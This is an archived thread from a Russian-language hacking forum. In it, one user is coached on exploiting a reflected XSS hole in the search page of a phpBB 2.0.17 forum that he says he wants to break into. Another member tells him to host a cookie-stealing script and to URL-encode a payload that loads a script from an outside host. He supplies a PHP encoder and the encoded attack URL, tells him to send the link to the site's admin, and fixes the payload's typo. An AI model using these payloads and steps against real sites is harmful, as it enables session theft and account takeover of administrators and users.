ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.06.2008, 14:26
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Когда чеовек получает сообщение с такой ссылкой,,,,вот что появляется
Код:
http://www.google.ru/search?q=%22%3E%3Cscript%20src=http://xxx.ru/script.js%3E%3C/script%3E
 |
|
|
10.06.2008, 14:27
|
|
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514
Репутация:
3313
|
|
Сообщение от geforse
Когда чеовек получает сообщение с такой ссылкой,,,,вот что появляется
Код:
http://www.google.ru/search?q=%22%3E%3Cscript%20src=http://xxx.ru/script.js%3E%3C/script%3E
закодируй ссылку в urlencode
|
|
|
|
10.06.2008, 14:47
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Сообщение от ChaaK
закодируй ссылку в urlencode
Закодировал...вставил в сообщение,,отослал:::вот что вылезает у получателя
|
|
|
|
10.06.2008, 15:13
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Значит xss в поиске использовать нельзя  |
|
|
|
10.06.2008, 16:02
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
убрал...
------------------------------------------------------------------------------------------------------------------
Я просканил этот сайт спайдером...вот он мне выдал
Когда подставляю эти значения (в опере) и захожу на сайт....ни чего нет, я не авторизирован//
Это форум phpBB 2.0.17,,,,только не посылайте в тему phpBB ни один эксплойт не работает и ксс тоже в сообщениях не пашет...вот только в поиске и работает
З.Ы. там где точки я затёр пару символов)))) |
|
|
|
10.06.2008, 18:04
|
|
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме:
2590715
Репутация:
659
|
|
1) Залей скрипт, ворующий куки.
2) Потом закодируй УРЛ ?search="><script scr=http://xxx.ru/script.js></script>
например вот так:
PHP код:
<TEXTAREA width=1000 height=1000>
<?
$st = $_GET["a"];
for ($i=0;$i<strlen($st);$i++){
$ch = substr($st,$i,1);
echo "%".dechex(ord($ch));
}
?>
</TEXTAREA>
3) Отсылай ссылку одмину |
|
|
|
10.06.2008, 18:19
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
diehard
ОГРОМНОЕ спасибо за помошь...
Но я не совсем понял....я на ВЫ с PHP....
1) Скрипт лежит на сайте www.xxx.ru/js.js
2)
Код:
http://site.ru/forum/ssearch.php?search="><script scr=http://xxx.ru/js.js></script>
( ssearch.php всё правильно, там 2 s)
Вот тут не совсем понял....как закодировать ???
URL Encode ???
----------------------------------------------------------------------
Что это за код и куда его "пихать" 
PHP код:
<TEXTAREA width=1000 height=1000>
<?
$st = $_GET["a"];
for ($i=0;$i<strlen($st);$i++){
$ch = substr($st,$i,1);
echo "%".dechex(ord($ch));
}
?> </TEXTAREA>
Ещё раз извините за возможно идиотские вопросы....прошу, только ответте
|
|
|
|
10.06.2008, 18:25
|
|
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме:
2590715
Репутация:
659
|
|
Этот код сохрани в 1.php и запусти под сервером, хоть на локалхосте: http://localhost/1.php?a=search="><script scr=http://xxx.ru/js.js></script>
В результате получится УРЛ вроде:
Код:
http://site.ru/forum/ssearch.php?%73%65%61%72%63%68%3d%22%3e%3c%73%63%72%69%70%74%20%73%63%72%3d%68%74%74%70%3a%2f%2f%78%78%78%2e%72%75%2f%6a%73%2e%6a%73%3e%3c%2f%73%63%72%69%70%74%3e
|
|
|
|
10.06.2008, 18:38
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Выходит вот что...
Код:
http://localhost/1.php?a=search=%22%3E%3Cscript%20scr=http://САЙТ.ru/js.js%3E%3C/script%3E
Теперь нужно это подставлять к поиску на site.ru (который хочу взломать)
или что-то опять не так делаю ??? |
|
|
|
10.06.2008, 18:49
|
|
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме:
2590715
Репутация:
659
|
|
ОМГ, теперь нажми ENTER
И исправь ошибку, не "scr=", а "src="
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
